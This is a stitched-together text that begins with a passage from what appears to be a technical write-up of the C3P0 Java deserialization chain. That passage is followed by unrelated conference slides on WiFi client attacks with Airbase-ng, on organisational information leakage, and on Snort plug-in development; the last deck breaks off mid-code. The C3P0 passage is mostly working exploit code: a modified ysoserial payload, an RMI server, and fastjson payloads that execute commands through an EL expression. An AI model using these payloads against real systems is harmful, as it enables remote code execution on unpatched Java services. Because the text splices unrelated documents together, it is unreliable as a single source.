private static final class PoolSource implements ConnectionPoolDataSource,
Referenceable {
private String className;
private String url;
public PoolSource ( String className, String url ) {
this.className = className;
this.url = url;
}
public Reference getReference () throws NamingException {
return new Reference("exploit", this.className, this.url);
}
public PrintWriter getLogWriter () throws SQLException {return null;}
public void setLogWriter ( PrintWriter out ) throws SQLException {}
public void setLoginTimeout ( int seconds ) throws SQLException {}
public int getLoginTimeout () throws SQLException {return 0;}
public Logger getParentLogger () throws SQLFeatureNotSupportedException
{return null;}
public PooledConnection getPooledConnection () throws SQLException
{return null;}
public PooledConnection getPooledConnection ( String user, String
password ) throws SQLException {return null;}
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(C3P0.class, args);
}
}
Class hierarchy
Following the class hierarchy, serialization enters PoolBackedDataSourceBase#writeObject(). By this point reflection has already replaced this.connectionPoolDataSource with a PoolSource, which does not implement the Serializable interface, so serializing that field fails and execution falls into the catch block, which then calls indirector.indirectForm(this.connectionPoolDataSource).
The var2 here is the Reference object returned by PoolSource#getReference(). Pay attention to its classFactory and classFactoryLocation parameters — they will matter later. That covers the serialization side; next comes deserialization.
Deserialization process
Deserialization entry point
Deserialization starts in com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject(), so let's look at that method in detail.
It first reads a version field and, when version is 1, enters a branch where any object that is an instance of IndirectlySerialized has its getObject method invoked. From the serialization step we know the serialized object, ReferenceSerialized, implements IndirectlySerialized, so deserialization continues into ReferenceSerialized#getObject().
Per the serialization step, only this.reference is populated and everything else is null, so execution reaches line 88: ReferenceableUtils.referenceToObject(this.reference, this.name, var2, this.env).
This method first reads the classFactory and classFactoryLocation that were passed when the Reference was constructed. If classFactoryLocation is non-null, the factory class can be loaded remotely through a URLClassLoader; if it is null, the class can be loaded locally via Class.forName, its constructor runs, and its getObjectInstance() method is then invoked. Note that forName is called with initialize=true, so a class that has never been initialized before gets initialized here. At this point the deserialization already enables an attack: load a remote class via URLClassLoader, or load a local class directly.
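That branch can be sketched in isolation. The following is a hypothetical re-implementation of the decision inside ReferenceableUtils.referenceToObject, using only the JDK's javax.naming.Reference — the describe() method and its wording are ours, not c3p0's:

```java
import javax.naming.Reference;

public class ReferenceDispatchSketch {

    // A non-null factory class location means remote loading via
    // URLClassLoader; a null one means a local Class.forName followed
    // by a call to the factory's getObjectInstance().
    static String describe(Reference ref) {
        String factory = ref.getFactoryClassName();
        String location = ref.getFactoryClassLocation();
        if (location != null) {
            return "remote: URLClassLoader loads " + factory + " from " + location;
        }
        return "local: Class.forName(\"" + factory + "\", true, ...) then getObjectInstance()";
    }

    public static void main(String[] args) {
        // Reference(className, factoryClassName, factoryClassLocation)
        Reference remote = new Reference("exploit", "EvilFactory", "http://attacker/");
        Reference local = new Reference("javax.el.ELProcessor",
                "org.apache.naming.factory.BeanFactory", null);
        System.out.println(describe(remote));
        System.out.println(describe(local));
    }
}
```

The second case is exactly the one the next section exploits: a local factory class whose getObjectInstance() does something interesting.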
A small observation
In the final step of deserialization, the class is loaded via Class.forName, an object is created, and its getObjectInstance method is executed. Among the known bypasses for JNDI injection on high JDK versions, the RMI-protocol bypass relies on the local factory org.apache.naming.factory.BeanFactory — and what ends up executing there is exactly org.apache.naming.factory.BeanFactory#getObjectInstance, which is just as usable here. Let's first look at the RMI bypass code.
It creates a ResourceRef object and binds the org.apache.naming.factory.BeanFactory factory class. Next, look at how the ResourceRef object is initialized.
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class EvilRMIServer {
public static void main(String[] args) throws Exception {
System.out.println("[*]Evil RMI Server is Listening on port: 1088");
Registry registry = LocateRegistry.createRegistry(1088);
// 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为
org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "",
true,"org.apache.naming.factory.BeanFactory",null);
// 强制将'x'属性的setter从'setX'变为'eval', 详细逻辑见
BeanFactory.getObjectInstance代码
ref.add(new StringRefAddr("forceString", "a=eval"));
// 利用表达式执行命令
ref.add(new StringRefAddr("a",
"Runtime.getRuntime().exec(\"notepad.exe\")"));
ReferenceWrapper referenceWrapper = new
com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
registry.bind("Object", referenceWrapper);
}
}
ResourceRef extends Reference. Its constructor first calls Reference's constructor, passing org.apache.naming.factory.BeanFactory as the factory parameter; factoryLocation — per the logic analyzed above — is null, so the class gets loaded locally via Class.forName. Based on this analysis we can simply modify the PoolSource code as follows:
package ysoserial.payloads;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import org.apache.naming.factory.BeanFactory;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-
java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0 implements ObjectPayload<Object> {
public Object getObject ( String command ) throws Exception {
PoolBackedDataSource b =
Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class,
"connectionPoolDataSource").set(b, new PoolSource());
        return b;
    }

    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
        private String className;
        private String url;

        public PoolSource() {}

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference () throws NamingException {
            //return new Reference("exploit", this.className, this.url);
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
            ref.add(new StringRefAddr("forceString", "a=eval"));
            ref.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"notepad.exe\")"));
            return ref;
        }

        public PrintWriter getLogWriter () throws SQLException {return null;}
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException {return 0;}
        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
        public PooledConnection getPooledConnection () throws SQLException {return null;}
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}
    }

    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(C3P0.class, args);
    }
}

With this in place, the EL expression can be used to execute arbitrary code.

C3P0: extended attacks
JNDI injection
This is exploited the same way as the approach above: both require outbound network access, and JNDI injection on high JDK versions is subject to many restrictions.
Hex-serialized byte loader
This extended attack does not require outbound access: through a second deserialization it can leverage other components to achieve arbitrary code execution. Usage scenario: with non-native deserialization (such as fastjson), C3P0 can be exploited with no outbound network access. The principle: during fastjson deserialization, the setter for userOverridesAsString is invoked; while that setter runs, a string beginning with HexAsciiSerializedMap is decoded and fed into a native deserialization.
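To make the trigger concrete, here is a stdlib-only sketch of how such a payload string is assembled. toHexAscii is a minimal stand-in for c3p0's com.mchange.lang.ByteUtils.toHexAscii, and the trailing "0" is the junk character that c3p0's slicing later discards:

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;

public class HexPayloadSketch {

    // Minimal stand-in for c3p0's ByteUtils.toHexAscii().
    static String toHexAscii(byte[] bytes) {
        StringBuilder sb = new StringBuilder(bytes.length * 2);
        for (byte b : bytes) {
            sb.append(String.format("%02X", b));
        }
        return sb.toString();
    }

    // Serialize an object and wrap it the way the fastjson payload does:
    // prefix, one separator character, hex data, one trailing junk character.
    static String wrap(Serializable obj) {
        try {
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
                oos.writeObject(obj);
            }
            return "HexAsciiSerializedMap:" + toHexAscii(bos.toByteArray()) + "0";
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        // Java serialization streams always begin with the magic ACED0005.
        System.out.println(wrap("demo").substring(0, 30));
    }
}
```

In the real exploit this string becomes the value of the userOverridesAsString JSON field, so the c3p0 setter hex-decodes it and hands the bytes to ObjectInputStream.readObject().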
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.*;
class Person {
public Object object;
}
public class TemplatePoc {
public static void main(String[] args) throws IOException {
String poc = "{\"object\":
[\"com.mchange.v2.c3p0.JndiRefForwardingDataSource\",
{\"jndiName\":\"rmi://localhost:8088/Exploit\", \"loginTimeout\":0}]}";
System.out.println(poc);
ObjectMapper objectMapper = new ObjectMapper();
objectMapper.enableDefaultTyping();
objectMapper.readValue(poc, Person.class);
}
public static byte[] toByteArray(InputStream in) throws IOException {
byte[] classBytes;
classBytes = new byte[in.available()];
in.read(classBytes);
in.close();
return classBytes;
}
public static String bytesToHexString(byte[] bArray, int length) {
StringBuffer sb = new StringBuffer(length);
for(int i = 0; i < length; ++i) {
String sTemp = Integer.toHexString(255 & bArray[i]);
if (sTemp.length() < 2) {
sb.append(0);
}
sb.append(sTemp.toUpperCase());
}
return sb.toString();
}
}
First, the setter triggers the parent class's setUserOverridesAsString method.
The fireVetoableChange() call in turn triggers WrapperConnectionPoolDataSource#setUpPropertyListeners(), which appears to work through a listener-style mechanism.
Execution then enters C3P0ImplUtils.parseUserOverridesAsString. Pay attention to how the string is sliced here: you have to append a junk character yourself.
package fastjson.example.bug;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import fastjson.example.use.User;
import java.beans.PropertyVetoException;
public class payload_ {
public static void main(String[] args) throws PropertyVetoException {
WrapperConnectionPoolDataSource wrapperConnectionPoolDataSource = new
WrapperConnectionPoolDataSource();
wrapperConnectionPoolDataSource.setUserOverridesAsString("HexAsciiSerializedMap
13123");
}
}
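The slicing that forces the extra junk character can be demonstrated in isolation. The following approximates what C3P0ImplUtils.parseUserOverridesAsString does with the string (one character after the header and the final character are dropped) — it is a sketch from reading the decompiled code, not c3p0's actual method:

```java
public class OverridesParseSketch {

    static final String HEADER = "HexAsciiSerializedMap";

    // Approximation of parseUserOverridesAsString's slicing: skip one
    // character after the header and drop the last character.
    static String extractHex(String userOverridesAsString) {
        return userOverridesAsString.substring(HEADER.length() + 1,
                userOverridesAsString.length() - 1);
    }

    public static void main(String[] args) {
        // The trailing "0" appended by the payload generator is exactly
        // what the parser throws away, keeping the hex data intact.
        System.out.println(extractHex("HexAsciiSerializedMap:ACED00050")); // ACED0005
    }
}
```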
That is basically the whole flow. Now let's use fastjson together with the C3P0 deserialization chain to pop a Notepad:
package fastjson.example.bug;
import com.alibaba.fastjson.JSON;
import com.mchange.lang.ByteUtils;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.*;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
public class fastJsonAndC3P0 {
public static void main(String[] args) throws IOException,
NoSuchFieldException, IllegalAccessException {
String serialpayload=bytesToHex(getObject());
String s = ByteUtils.toHexAscii(getObject());
System.out.println(s);
String payload="
{\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\"userOverrid
esAsString\":\"HexAsciiSerializedMap:"+s+"0\"}";
System.out.println(payload);
JSON.parseObject(payload);
//org.apache.el.ExpressionFactoryImpl
}
public static String bytesToHex(byte[] bytes) {
StringBuffer stringBuffer = new StringBuffer();
for (int i = 0; i < bytes.length; i++) {
String s = Integer.toHexString(bytes[i] & 0xFF);
if (s.length() < 2) {
s = "0" + s;
}
stringBuffer.append(s.toLowerCase());
}
return stringBuffer.toString();
}
private static byte[] getObject() throws NoSuchFieldException,
IllegalAccessException, IOException { // build the serialized c3p0 object
PoolBackedDataSource poolBackedDataSource = new PoolBackedDataSource();
Field connectionPoolDataSource =
PoolBackedDataSourceBase.class.getDeclaredField("connectionPoolDataSource");
connectionPoolDataSource.setAccessible(true);
connectionPoolDataSource.set(poolBackedDataSource,new PoolSource());
ByteArrayOutputStream byteArrayOutputStream = new
ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new
ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(poolBackedDataSource);
return byteArrayOutputStream.toByteArray();
}
private static final class PoolSource implements ConnectionPoolDataSource,
Referenceable {
private String className;
private String url;
public PoolSource(){}
public PoolSource ( String className, String url ) {
this.className = className;
this.url = url;
}
public Reference getReference () throws NamingException {
//return new Reference("exploit", this.className, this.url);
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "",
"", true,"org.apache.naming.factory.BeanFactory",null);
ref.add(new StringRefAddr("forceString", "a=eval"));
ref.add(new StringRefAddr("a",
"Runtime.getRuntime().exec(\"notepad.exe\")"));
return ref;
//com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
}
public PrintWriter getLogWriter () throws SQLException {return null;}
public void setLogWriter ( PrintWriter out ) throws SQLException {}
public void setLoginTimeout ( int seconds ) throws SQLException {}
public int getLoginTimeout () throws SQLException {return 0;}
public Logger getParentLogger () throws SQLFeatureNotSupportedException
{return null;}
public PooledConnection getPooledConnection () throws SQLException
{return null;}
public PooledConnection getPooledConnection ( String user, String
password ) throws SQLException {return null;}
}
}
/*
Note: using javax.el.ELProcessor requires adding the two extra dependencies below.
Reference articles:
1. "c3p0's three gadgets"
2. "Java deserialization: exploiting C3P0 without outbound network access"
3. "Java security: exploitation and analysis of the C3P0 chain"
4. "A brief look at JNDI injection and bypasses on old and new JDK versions"
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-catalina</artifactId>
<version>8.5.40</version>
</dependency>
<dependency>
<groupId>org.mortbay.jasper</groupId>
<artifactId>apache-el</artifactId>
<version>8.0.27</version>
</dependency>
*/
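To see why the payload above appends a trailing "0" after the hex string, it helps to look at how c3p0 parses `userOverridesAsString`. The exact logic lives in c3p0's `C3P0ImplUtils`; the strip-prefix-then-drop-last-character behavior shown here is my reading of why the exploit needs that trailing character, so treat it as an assumption. A minimal, dependency-free sketch of the round trip:

```java
import java.nio.charset.StandardCharsets;

public class HexAsciiSketch {
    static final String PREFIX = "HexAsciiSerializedMap";

    // Hex-encode bytes, mirroring bytesToHex() in the exploit above.
    static String toHexAscii(byte[] bytes) {
        StringBuilder sb = new StringBuilder();
        for (byte b : bytes) sb.append(String.format("%02x", b & 0xFF));
        return sb.toString();
    }

    // Simulated c3p0-style parse: strip "HexAsciiSerializedMap:" and the final
    // character, then hex-decode the remainder back into the serialized object.
    static byte[] parseUserOverrides(String s) {
        String hex = s.substring(PREFIX.length() + 1, s.length() - 1);
        byte[] out = new byte[hex.length() / 2];
        for (int i = 0; i < out.length; i++)
            out[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
        return out;
    }

    public static void main(String[] args) {
        byte[] original = "serialized-object-bytes".getBytes(StandardCharsets.US_ASCII);
        // The exploit builds: "HexAsciiSerializedMap:" + hex + "0"
        String value = PREFIX + ":" + toHexAscii(original) + "0";
        System.out.println(new String(parseUserOverrides(value), StandardCharsets.US_ASCII));
    }
}
```

In the real chain, the decoded bytes are fed to `ObjectInputStream.readObject()`, which is what fires the `getReference()` gadget.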
Shifting the Focus of
WiFi Security:
Beyond cracking your
neighbor's wep key
Who are we and why do you care?
Thomas “Mister_X” d'Otreppe de Bouvette
Founder of Aircrack-ng
Rick “Zero_Chaos” Farina
Aircrack-ng Team Member
Embedded Development
FD: Also works for a WIPS Vendor
DISCLAIMER:
Some of the topics in this presentation
may be used to break the law in new and
exciting ways…
of course we do not recommend breaking
the law and it is your responsibility to
check your local laws and abide by them.
DO NOT blame us when a three letter
organization knocks on your door.
History of WEP Attacks / Why it doesn’t work
Passively Sniff for a long time
Slow, not enough data, impatient
No more weak ivs
Replay/Injection Attacks
Fast but very noisy
Simple signatures
AP features that try to block (PSPF)
History of WPA Attacks / Why it doesn’t work
Pre-shared key
Requires catching both sides of a quick
handshake
Must be in range of client and AP
Enterprise
Nearly impossible to crack passively
Most EAP types are difficult (at best) to MiTM
The Well Guarded Door
Nearly 100% of attacks focus on the AP
APs are getting more and more secure
New features built into AP
PSPF / Client Isolation
Strong Authentication / Encryption
Lightweight controller based architecture
APs are no longer the unguarded back door
Well deployed with forethought for security
Well developed industry best practices
Take the Path of Least Resistance
Attack the Clients!
Tools have slowly appeared recently
Difficult to use
Odd requirements to make them function
Attacking Client WEP Key
Wep0ff
Caffe-Latte
Caffe-Latte Frag
Attacking Client WPA Key
WPA-PSK
No public implementation
WPA-ENT
Freeradius-wpe (thanks Brad and Josh!)
Requires hardware AP
Attacking the Client
Many Separate Tools
Difficult to configure
Typically sparsely documented
Odd requirements and configurations
Until now…
Introducing Airbase-ng
Merges many tools into one
New and improved, simplified implementations
Full monitor mode AP simulation, needs no
extra hardware
Easy, fast, deadly (to encryption keys at least)
Airbase-ng Demo
Evil Twin / Honey Pot
Karma
WEP attacks
WPA-PSK attacks
WPA-Enterprise attacks (if completed in
time)
What are you, a blackhat?
No seriously, this doesn’t promise a win
There are ways to defend as well
APs are finally being configured securely,
now clients must be as well
Simple Defenses
Proper Secure Client Configurations
Check the right boxes
GPO
(Still in process of completing this section,
please download final slides from link at
the end of presentation)
Beyond the Basics
Wireless Intrusion Detection and Prevention
Systems designed to detect attacks and
sometimes even prevent them
(Full explanation of WIPS systems and
features will follow, with no vendor bashing,
however Rick is still gaining permissions
required by his employer so this section will be
left uncompleted for now)
A Step Beyond Crazy
WiFi Frequencies
.11b/g 2412-2462 (US)
.11a 5180-5320, 5745-5825 (US)
Does this look odd to anyone else?
Licensed Bands
Some vendors carry licensed radios
Special wifi cards for use by military and
public safety
Typically expensive
Requires a license to even purchase
Frequencies of 4920 seem surprisingly
close to 5180
Can we do this cheaper?
Atheros and others sometimes support
more channels
Allows for 1 radio to be sold for many
purposes.
Software controls the allowed frequencies
Who Controls the Software?
Sadly, typically the chipset vendors
Most wifi drivers in linux require binary
firmware
This firmware controls regulatory
compliance as well as purposing
What can we do?
Fortunately, most linux users don’t like
closed source binaries
For many reasons, fully open sourced
drivers are being developed
As these drivers become stable, we can
start to play
Let’s Play…
Madwifi-ng is driven by a binary HAL
Ath5k is the next gen fully open source
driver
Kugutsumen released a patch for
“DEBUG” regdomain
Allows for all supported channels to be
tuned to
New Toys
Yesterday
.11b/g 2412-2462 (US)
.11a 5180-5320, 5745-5825 (US)
Today
.11a 4920-6100 (DEBUG)
What to do now?
What is on these new frequencies?
(insert full image of frequency map)
But does it really work?
Spectrum Analyzer Demo
Fully tested frequencies
(finish complete testing)
Warning: This may differ from card to card
Limitations
Many real licensed implementations are broken
Card reports channel 1 but is actually on
4920MHz
This is done to make it easy to use existing
drivers
This breaks many open source applications
Airodump-ng
Airodump-ng now supports a list of
frequencies to scan rather than channels
Only channels are shown in the display, and they may be wrong
Strips vital header information off of packet
so data saved from extended channels is
useless
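The channel/frequency confusion described above is easier to reason about with the standard IEEE 802.11 mapping: in the 2.4 GHz band, channel n sits at 2407 + 5n MHz (channel 14 is special-cased at 2484 MHz), and in the 5 GHz band, channel n sits at 5000 + 5n MHz. A small sketch of that convention (Java, purely for illustration):

```java
public class WifiChannels {
    // 2.4 GHz band: channel n -> 2407 + 5*n MHz; channel 14 is special (2484 MHz).
    static int freq24(int channel) {
        if (channel == 14) return 2484;
        return 2407 + 5 * channel;
    }

    // 5 GHz band: channel n -> 5000 + 5*n MHz.
    static int freq5(int channel) {
        return 5000 + 5 * channel;
    }

    // Invert the 5 GHz formula. Under it, 4920 MHz comes out as "channel -16" —
    // no valid 5 GHz channel. 802.11j instead maps the 4.9 GHz public-safety band
    // from a 4000 MHz base (4000 + 5*184 = 4920), which is why firmware that
    // reports such a frequency as "channel 1" is lying to the tools.
    static int channel5(int freqMhz) {
        return (freqMhz - 5000) / 5;
    }

    public static void main(String[] args) {
        System.out.println("ch 1 (2.4 GHz) = " + freq24(1) + " MHz");  // 2412
        System.out.println("ch 36 (5 GHz) = " + freq5(36) + " MHz");   // 5180
        System.out.println("4920 MHz = ch " + channel5(4920));         // -16
    }
}
```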
Kismet
At the time of writing, Kismet is unable to handle most of the extended channels
Displays channels not frequencies
Does save usable pcap files
Improvement Needed
Sniffers are too trusting; they believe what they see
Never intended to deal with oddly broken
implementations such as channel number
fudging
Sniffers need to be improved to report
more reality and fewer assumptions
Final Thoughts
Remember everyone here is a white hat
Please use your new found knowledge for
good not evil
In the United States it is LEGAL to monitor
all radio frequencies (except those used
by cell phones)
Have fun…
Thanks
Updated Slide Presentation can be found at:
http://www.aircrack-ng.org/defcon16.ppt
Bibliography
http://www.willhackforsushi.com/FreeRADIUS-WPE.h
etc | pdf |
Information Leakage
or
Call a Plumber ---
your Info is Leaking
Joe Klein, CISSP
Sr. Security Engineer, AVAYA
[email protected]
Overview
Background for this Speech
What is Information Leakage?
What is the Risk?
Types of Information Leakage?
Technical
People
Process
How to Protect?
Background of the speech
Art of War –
Know neither yourself nor the enemy, and you are lost
Know yourself but not the enemy, and you are not likely to win
Know both yourself and the enemy, and you are certain to win
Sophistication of Attacker vs
Level of Protection
Level of Protection
None
Average
High
Sophistication of Attacker
Low
Mid
High
Unsuccessful Attack
Discovered
Successful Attack
Undiscovered
Legal/Regulatory
Requirements
Best Practices
Perfect
Security
What is Information Leakage(IL)?
Information which is released
purposefully or accidentally,
placing your staff, intellectual property,
systems and networks
at risk.
What is the Risk of IL?
Greatly improves the success of an
attacker
Places the organization at a competitive
disadvantage
Places organization at legal risk
Can lead to physical harm of staff and
facilities
Types of Information Leakage?
Technology
People
Process
Technical
Passive
Listening
Sniffers, scanning frequencies
Active
Integration
War driving, war dialing, scanning networks
Technical
Layer 2
Mac Address, SSID, Frequency Used
Identify Make of systems
Layer 3
Active
nmap, qoso, xprobe, icmp, packeto
Passive
Sniffers, Kismet, radio scanner, etc
Technical
Layer 4 and above
SNMP
System – processes, software, configurations
Network – internal networks, routes, protocols
Application Servers
Web sites: http://www.netcraft.com/
Chat, E-mail, Usenet, Mailing Lists
Look at header information of posting
Applications
See BH 2003 - - for details
Technical
Special Cases
Firewalls
Firewalk
Firewall Fingerprint papers
Tempest – Emissions
Electro Magnetic
Other
Surveillance Devices
People
Posting information on website
http://www.target.com
http://www.google.com/advanced_search?hl=en
Use domain option
http://webdev.archive.org/
http://www.google.com
Technical Records
www.ARIN.net, www.whois.net
Marketing Material, Advertisements, Press releases
http://www.cyberalert.com/
http://www.inboxrobot.com/
Tradeshows
The 'bar', smokers' lounge, organizational parties
People
Technical staff
Call to Vendor Technical Support
Gives full configurations, including passwords and network
design to get help on problem
Outsourcing of Technical Support
Cisco, Microsoft, Oracle, Peoplesoft and others
Outsource Companies have a lower security requirements then
original company
Posting questions on the Internet (Usenet news,
web pages, etc.)
http://tile.net/
http://www.google.com/advanced_group_search?hl=en
http://www.robofetch.com/
People
Management
“Exception to Security Rules”
Other
DR Drills
People
Posting résumés, anonymous comments on
“Financial Comment Board”,
Fu*kedcompany.com, etc
Job Postings
http://hotjobs.yahoo.com/
http://www.brassring.com/
http://www.net-temps.com/
http://www.monster.com/
http://www.careerbuilder.com/
Social engineering calls
Mail/E-Mail deliveries
Trojans, backdoors
People
News Searches
http://www.newsindex.com/
http://library.uncg.edu/news/
http://www.totalnews.com/
http://www.upi.com/
http://www.thepaperboy.com.au/welcome.ht
ml
http://www.onlinenewspapers.com/
People
Address Phone Number
http://www.switchboard.com/
http://finder.geoportals.com/
http://www.infospace.com/
http://www.infobel.com/world/default.asp
Other Personal Records
$ http://www.ussearch.com/wlcs/index.jsp
http://www.whowhere.lycos.com/
Genealogy
http://ancestry.lycos.com/
Phone Reverse Lookup
http://www.anywho.com/rl.html
People
E-Mail Address
http://mesa.rrzn.uni-hannover.de/
Class Mate.com
http://search.classmates.com/user/search/adv.tf
ICQ
http://web.icq.com/whitepages/location/0,,,00.html
Public Records
http://www.constructionweblinks.com/Industry_Topic
s/Public_Records/public_records.html
http://www.searchsystems.net/
People
Hidden Gems
Intelliseek
http://www.invisibleweb.com
http://www.prefusion.com
Invisible-web.net
http://www.invisible-web.net/
Librarians' Index to the Internet
http://www.lii.org
Questia
http://www.questia.com/
Process
Paper
Paper (Dumpster Diving)
Backups
Tapes, CDs, DVDs, and floppies
Technology
Hard Drives, PDAs, Cell Phones
Cleaning Staff
Can they be trusted? Are you sure?
Process
Posting by the Government
Financials & Personal Information
http://www.sec.gov/edgar.shtml
http://www.hoovers.com/
http://www.searchsystems.net/
http://www.infotoday.com/
http://www.dnb.com/us/
http://www.aicpa.org/yellow/ypgsec.htm
Partners & Vendors Disclose Relationships
Google - link: target.com
http://amexb2b.disk11.com
How to Protect?
People:
Limit what is posted publicly to the net
Education staff about danger
Process
Perform/Have someone perform a Competitive Intelligence
search on a regular bases
"Extreme damage" items must be removed 'from view'
Technology
Consider changing banners on systems
General:
Create a classification system based on the risk
No damage to organization or people
Some damage to organization and/or people
Extreme damage to organization and/or people
Consider posting a few slivers of information – Misinformation
Perform all the other 'best practices' in security
Information Leakage
or
Call a Plumber ---
your info is leaking
Joe Klein, CISSP
Sr. Security Engineer, AVAYA
[email protected] | pdf |
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
Snort Plug-in Development:
Teaching an Old Pig New Tricks
Ben Feinstein, CISSP GCFA
SecureWorks Counter Threat Unit™
DEFCON 16
August 8, 2008
•
Snort v2 Architecture & Internals
•
Snort Plug-in Development
Dynamic Rules
Dynamic Preprocessors
•
Snort Plug-in API
Examples, Pitfalls, Tips
•
Releasing two Dynamic Preprocessors
ActiveX Virtual Killbits (DEMO)
Debian OpenSSL Predictable PRNG Detection (DEMO)
What’s In This Talk?
•
Open-source IDS created by Marty Roesch
•
First released for *NIX platforms 1998
•
Commercialized by Sourcefire, Inc.
•
Snort Inline mode now available for IPS
Linux Bridge + Netfilter
Linux ip_queue and nf_queue interfaces
•
Snort v3 now making its way through Beta
NOT discussing plug-ins for v3
NOT discussing v3 architecture (ask Marty)
Snort Basics
•
Highly modularized for extensibility
•
Snort Rules & The Rules Matching Engine
SF Engine Dynamic Plug-in
Detection Plug-ins – implement/extend rules language
•
Output Plugins
Unified / Unified2
Syslog
Others
•
Preprocessors
Detection (i.e. alerting)
Normalization (i.e. decoding)
Snort v2 Architecture
The Basics
•
Dynamic Preprocessors
Define a packet processing callback
Preprocessor local storage
Stream-local storage
•
Dynamic Rules
Writing Snort rules in C
v2.6.x (?), added ability to register a C callback
• Before, only useful as form of rule obfuscation
Used by some commercial Snort rulesets
Relatively straight forward to RE using IDA Pro
Snort v2 Architecture
Run-time (Dynamic) Extensions
•
Alert vs. Log
Log contains packet capture data in addition
•
Unified2 is extensible
Additional data in simple Length|Value encoding
•
Does your detection preprocessor need to log additional
alert data?
Use Unified2!
•
Examples
Portscan Alerts
Preprocessor Stats
Other Snort Internals of Interest
Unified2 Output Formats
The Information Security Experts
Copyright © 2008 SecureWorks, Inc. All rights reserved.
•
Familiarity with the C language
•
Lack of code-level documentation
What is available is out of date
•
Snort-Devel mailing list
Sourcefire developers are very responsive, thanks!
Do your homework before mailing the list.
You will get a better response and save everybody time.
•
Source contains very basic examples
Dynamic Rules
Dynamic Preprocessor
Snort Plug-in Development
Getting Started
•
Use the Source!
•
Examine existing plug-ins
SMTP
DNS
SSH
SSL
HTTP Inspect (bigger)
•
Write small blocks of code and (unit) test them
•
Ask questions on the Snort-Devel mailing list
Snort Plug-in Development
Getting Started, Continued
•
Snort 2.8.x source tarball
•
CentOS 5
gcc 4.1
glibc 2.5
•
GNU Autoconf 2.61
CentOS 5 packages older version 2.59
•
GNU Automake 1.10
CentOS 5 packages older version 1.9.6
Snort Development Environment
•
Key header file "sf_snort_plugin_api.h"
Defines C-struct equivalents to rule syntax
•
You define global variable
Rules *rules[]
Framework will handle the rest
•
Makefile
Compile C files into object code
Use GNU Libtool to make dynamic shared objects
•
Dynamically loaded by Snort at run-time
Snort Dynamic Rules
Background
•
Snort config
--dynamic-detection-lib <.so file>
--dynamic-detection-lib-dir <path to .so file(s)>
•
Snort can create stub rules files for all loaded dynamic rules
--dump-dynamic-rules <output path>
•
"meta rules" must be loaded in Snort rules file
alert tcp any any -> any any (msg:"Hello World!"; […]
metadata : engine shared, soid 3|2000001;
sid:2000001; gid:3; rev:1; […] )
Snort Dynamic Rules
Configuration
•
Different C structs for each rule option in rules language
•
A Rule Option is a Union of different specific rule opt structs
•
Rule struct w/ NULL-terminated array of Rule Options
Rule Header
Rule References
•
Functions for matching
content, flow, flowbits, pcre, byte_test, byte_jump
•
Function to register and dump rules
Snort Plug-in API
static ContentInfo sid109content =
{
(u_int8_t *)"NetBus",
/* pattern to search for */
0,
/* depth */
0,
/* offset */
CONTENT_BUF_NORMALIZED,
/* flags */
NULL,
